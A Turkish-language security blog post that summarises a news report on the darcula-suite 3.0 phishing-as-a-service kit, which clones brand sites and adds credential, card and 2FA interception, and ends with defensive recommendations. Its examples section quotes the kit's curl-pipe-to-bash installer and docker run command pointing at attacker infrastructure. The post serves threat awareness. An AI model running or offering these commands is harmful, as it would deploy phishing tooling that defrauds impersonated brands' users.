
Giriş:
Son yıllarda siber suçlar giderek artış göstermekte ve kötü niyetli kişilerin hedefledikleri marka ve kuruluşları taklit eden phishing (oltalama) çalışmaları, oldukça sofistike hale gelmiştir. Bu bağlamda, “darcula-suite 3.0” adı verilen yeni bir araç, kullanıcıların istediği marka için sahte web siteleri oluşturmasına olanak tanıyan bir phishing-as-a-service (PhaaS) platformu olarak dikkat çekmektedir. Bu yazıda, darcula 3.0 aracının teknik detayları, olası riskleri ve alınması gereken önlemler hakkında bilgi verilecektir.
Teknik Açıklamalar:
Darcula-suite 3.0, kullanıcıların hedefledikleri bir web sitesi URL’sini girmesiyle başlayan otomatik bir phishing kit oluşturma sürecini içerir. Sistem, bir headless Chrome instance’ı başlatarak, belirlenen URL’deki HTML/CSS bileşenlerini klonlayarak, gerçek bir web sayfasının neredeyse birebir kopyasını elde eder. Bu sayede, kullanıcı giriş portalları, ödeme sayfaları ve marka arayüzleri gibi bileşenlerin eksiksiz kopyaları oluşturulabilir.
Darcula-suite 3.0 platformu, Docker konteynerleri kullanarak arka uç hizmetlerini barındırmakta ve özelleştirilmiş görüntüler ile güvenli bir şekilde çalışma imkanı sunmaktadır. Kullanıcılar, bir grafik arayüz aracılığıyla HTML bileşenlerini seçerek, kimlik bilgisi hırsızları, kart kaydediciler ve iki faktörlü kimlik doğrulama (2FA) kesicileri ekleyebilir. Sonuçta elde edilen kod, dağıtım için “.cat-page” paketleri olarak paketlenir.
Örnekler:
Bir darcula-admin panel bileşenlerinin kurulumu için kullanılacak bir komut aşağıdaki gibidir:
!
curl -s v3[.]magic-cat[.]world/install.sh | bash
!
Benzer şekilde, darcula web bileşeni için bir Docker çalıştırma komutu şu şekildedir:
!
docker run -d -p 8080:8080 registry.magic-cat.world/v3/web:latest
!
Darcula 3.0, JavaScript ile dinamik içerik yüklemesi gerektiren React tabanlı istemci tarafı oluşturma yöntemini kullanır. Bu yaklaşım, temel tarayıcı tespit sistemlerinin bypass edilmesine yardımcı olurken, kurbanların konumuna ve cihaz türüne göre içerik enjeksiyonu yapılmasına olanak tanır.
Önlemler & En İyi Uygulamalar:
Darcula 3.0’ın kullanımı ile birlikte, siber güvenlik tehditleri artmaktadır. Bu nedenle, kuruluşların alan itibariyle itibara dayalı hizmetlerin yanı sıra, dolaylı oltalama göstergelerinin de izlenmesi gerekmektedir. Siber güvenlik stratejileri, istemci tarafı analizleri ve davranışsal tespitlerin bir kombinasyonunu içermelidir. Ayrıca, geçmişte kullanılan alt alan adındaki saldırıların %63’ünün, özel alt alanlar yerine yol tabanlı URL’ler kullanması, klasik alan adı tabanlı engellemelerin yetersiz kalabileceğini göstermektedir.
Sonuç & Özet:
Darcula-suite 3.0, bir marka için sahte web siteleri oluşturmayı büyük ölçüde kolaylaştıran güçlü bir araç olarak siber suçluların elini güçlendirmektedir. Kuruluşların bu tür tehditlere karşı hazırlıklı olmaları için gelişmiş izleme sistemleri ve kapsamlı bir güvenlik stratejisi geliştirmeleri şarttır. Daima güncel bilgiye ve pratik önlemlere sahip olmak, siber güvenlikte başarıya giden yolda kritik bir adım olacaktır.
Kaynakça:
https://cybersecuritynews.com/darcula-3-0-tool-automatically-generates-phishing-kit-for-any-brand/ [Collection]